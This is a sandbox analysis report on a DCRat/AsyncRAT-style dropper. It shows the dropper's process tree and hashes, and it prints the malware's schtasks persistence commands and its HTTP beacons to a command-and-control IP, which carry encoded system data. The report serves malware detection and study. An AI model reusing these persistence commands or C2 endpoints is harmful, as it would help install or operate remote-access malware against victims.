Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 12, 2021, 10:42 a.m.	April 12, 2021, 10:56 a.m.

Size	947.2KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`775b36643d8ded334c9411920713a711`
SHA256	`0af132eb3ba6c1bf62e1d877cafec106257fc03de23212415d2694f69f55b25f`
CRC32	`BD2F0AD8`
ssdeep	`24576:U2G/nvxW3Ww0tr8aynZcBJN2AtuwxuV9WNz4WbA40SdsOqcJJ+n:UbA306WNz4WU4DtKn`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT escalate_priv - Escalade priviledges screenshot - Take screenshot keylogger - Run a keylogger sniff_audio - Record Audio win_registry - Affect system registries win_token - Affect system token win_files_operation - Affect private profile PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero IsPE32 - (no description) IsWindowsGUI - (no description) HasOverlay - Overlay Check HasDebugData - DebugData Check HasRichSignature - Rich Signature Check

DCRatBuild.exe "C:\Users\test22\AppData\Local\Temp\DCRatBuild.exe"
7388
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\BrokerMonitor\UvLaqEk3BNeSNXAL5asuk.vbe"
  6192
  - cmd.exe cmd /c ""C:\BrokerMonitor\YaunL2sDbBHWXuwZCxWkball.bat" "
    4016
    - BrokerMonitorSessionbrokerNet.exe "C:\BrokerMonitor\BrokerMonitorSessionbrokerNet.exe"
      5640
      - schtasks.exe "schtasks" /create /tn "KMService" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\KMService.exe'" /rl HIGHEST /f
        3724
      - schtasks.exe "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\LICENSE\pw.exe'" /rl HIGHEST /f
        2196
      - schtasks.exe "schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\SchCache\Idle.exe'" /rl HIGHEST /f
        7076
      - schtasks.exe "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\KMService\explorer.exe'" /rl HIGHEST /f
        5992
      - cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\Public\pJ3dEqpH1A.bat"
        4104
        
        chcp.com chcp 65001
        4744
        
        PING.EXE ping -n 5 localhost
        6652
        
        explorer.exe "C:\Windows\KMService\explorer.exe"
        1904

Name	Response	Post-Analysis Lookup
ipinfo.io	A 216.239.34.21 A 216.239.36.21 A 216.239.38.21 A 216.239.32.21	216.239.32.21

IP Address	Status	Action
131.153.76.130	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
216.239.36.21	Active	Moloch
82.146.59.236	Active	Moloch
193.218.118.85	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (21 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:42 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:43 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 12, 2021, 10:42 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:42 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:42 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:42 a.m.			0	0

Command line console output was observed (8 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: C:\BrokerMonitor> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: "C:\BrokerMonitor\BrokerMonitorSessionbrokerNet.exe" console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: SUCCESS: The scheduled task "KMService" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: SUCCESS: The scheduled task "pw" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: SUCCESS: The scheduled task "Idle" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: SUCCESS: The scheduled task "explorer" has successfully been created. console_handle: 0x0000000000000007	1	1
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1
WriteConsoleW April 12, 2021, 10:42 a.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 12, 2021, 10:42 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.didat

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 12, 2021, 10:43 a.m.	stacktrace: 0x7fe92eb8b5a 0x7fe92eb893b 0x7fe92eb8871 0x7fe92eae2c8 mscorlib+0x4ef8a5 @ 0x7feecf9f8a5 mscorlib+0x4ef609 @ 0x7feecf9f609 mscorlib+0x4ef5c7 @ 0x7feecf9f5c7 mscorlib+0x502d21 @ 0x7feecfb2d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef252f713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef252f242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef252f30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef26f6291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef25d6d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef25d6d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef25d6c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef25d6dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef26f6175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef26666ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521 exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 54 e0 exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe92eb8b5a registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 8789968320656 registers.rbx: 0 registers.rsp: 484114272 registers.r11: 484109168 registers.r8: 40685468 registers.r9: 40685452 registers.rdx: 40685440 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

April 12, 2021, 10:43 a.m.

stacktrace:

0x7fe92eb8b5a
0x7fe92eb893b
0x7fe92eb8871
0x7fe92eae2c8
mscorlib+0x4ef8a5 @ 0x7feecf9f8a5
mscorlib+0x4ef609 @ 0x7feecf9f609
mscorlib+0x4ef5c7 @ 0x7feecf9f5c7
mscorlib+0x502d21 @ 0x7feecfb2d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef252f713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef252f242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef252f30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef26f6291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef25d6d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef25d6d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef25d6c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef25d6dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef26f6175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef26666ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76e5652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x771ec521

exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 54 e0
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe92eb8b5a
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 8789968320656
registers.rbx: 0
registers.rsp: 484114272
registers.r11: 484109168
registers.r8: 40685468
registers.r9: 40685452
registers.rdx: 40685440
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&46203bcc475d4509a3a86d65325f8855=d0f20e2b176e1456ae89e4aa36cdd07d&MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO
suspicious_features	Connection to IP address	suspicious_request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&aabb8f74bac12735e9499cd9c6b8baf5=365da4edf7808b477a8d10cbf7405c61&f53d57fa5ca170272892cd3c6aa17be0=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO
suspicious_features	Connection to IP address	suspicious_request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0QzNwkDN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&095b88682a67bcf69516cfbd401a51e6=u4iL5J3b0NWZylGZgcmbp5mbhN2U&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
suspicious_features	Connection to IP address	suspicious_request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0QzNwkDN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&daa9160ddf6ef6047103286e2afebca3=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&10f2fa0bda69a6c3f898819a603f080d=wYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZ&095b88682a67bcf69516cfbd401a51e6=9JicldWYuFWTg0WYyd2byBlI6IydvRmbpdFVDFkIsISWiojIulWbkF0cpJCLi4kI6ISbhNmYld1cpJCLiklI6ISZu9Gaw9mcjlWTzlmIsIiI6IyRBRlIsICdpJEI0YDIOtEIsFmbvl2czVmZvJHUgcDIzd3bk5WaXJiOiIXZW5WaXJCL9JCa0VXYn5WazNXat9CXvlmLvZmbpBXavw1LcpzcwRHdoJiOiUWbkFWZyJCLiwWdvV2UvwVYpNXQiojIl52b6VWbpRnIsIiN4EzMwIiOiwWY0N3bwJCLi02bjVGblRFIhVmcvtEI2YzN0MVQiojInJ3biwiI0gzN54iNyEDLwYjN14yNzIiOiM2bsJCLiI1SiojI5JHduV3bjJCLiwWdvV2UiojIu9WanVmciwiIsV3blNlI6ISe0l2YiwiIwUTMuQzMx4COwIjL1cTMiojIwlmI7pjIvZmbJBXSiwiIyIDdzVGdiojIl1WYOJXZzVlIsIyQQ1iMyQ1UFRlI6ISZtFmTDBlIsICOuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QZ0gzYlVTY4YzN3QmMlRWNzQ2YxcjMhdTNmhDMkdTMlFTY5kjZ3gzM

Performs some HTTP requests (5 events)

request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&46203bcc475d4509a3a86d65325f8855=d0f20e2b176e1456ae89e4aa36cdd07d&MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO
request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&aabb8f74bac12735e9499cd9c6b8baf5=365da4edf7808b477a8d10cbf7405c61&f53d57fa5ca170272892cd3c6aa17be0=wY3AzM2ITM5YWNmljN3UDO4YDN5gjYjljMhZTO3M2YmZTOilTY2cjN&MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO
request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0QzNwkDN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&095b88682a67bcf69516cfbd401a51e6=u4iL5J3b0NWZylGZgcmbp5mbhN2U&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET http://82.146.59.236/processorDefault.php?MlqRJsMa1QMYKi=JiLYs2Wrxn&Fz95wpigN=qS7WYrUCPZjp5FgbO&8132fb67618ecd9be106ef9ba3717022=QM5EjZxU2YjdTZykDNwQjN3YzN2IDNjlTZ0UzYwYWY2YmMlRDN0MGM5cjNwcTN2gjM0QzNwkDN&f53d57fa5ca170272892cd3c6aa17be0=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&daa9160ddf6ef6047103286e2afebca3=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&10f2fa0bda69a6c3f898819a603f080d=wYhRjY4cjZ0M2M0IGO2EGMycTN1QDMiVWZiNDZ1YzMlV2N0U2N0MjZ&095b88682a67bcf69516cfbd401a51e6=9JicldWYuFWTg0WYyd2byBlI6IydvRmbpdFVDFkIsISWiojIulWbkF0cpJCLi4kI6ISbhNmYld1cpJCLiklI6ISZu9Gaw9mcjlWTzlmIsIiI6IyRBRlIsICdpJEI0YDIOtEIsFmbvl2czVmZvJHUgcDIzd3bk5WaXJiOiIXZW5WaXJCL9JCa0VXYn5WazNXat9CXvlmLvZmbpBXavw1LcpzcwRHdoJiOiUWbkFWZyJCLiwWdvV2UvwVYpNXQiojIl52b6VWbpRnIsIiN4EzMwIiOiwWY0N3bwJCLi02bjVGblRFIhVmcvtEI2YzN0MVQiojInJ3biwiI0gzN54iNyEDLwYjN14yNzIiOiM2bsJCLiI1SiojI5JHduV3bjJCLiwWdvV2UiojIu9WanVmciwiIsV3blNlI6ISe0l2YiwiIwUTMuQzMx4COwIjL1cTMiojIwlmI7pjIvZmbJBXSiwiIyIDdzVGdiojIl1WYOJXZzVlIsIyQQ1iMyQ1UFRlI6ISZtFmTDBlIsICOuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&c5c532831db1a7dab19172319a0ff14a=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&c6dd1cba03876c3affd0f11b003ca4a6=QZ0gzYlVTY4YzN3QmMlRWNzQ2YxcjMhdTNmhDMkdTMlFTY5kjZ3gzM
request	GET https://ipinfo.io/json

Allocates read-write-execute memory (usually to unpack itself) (50 out of 195 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 6192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2401000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2a9b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2402000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2404000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c6a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92c7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:42 a.m.	process_identifier: 5640 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe92da0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
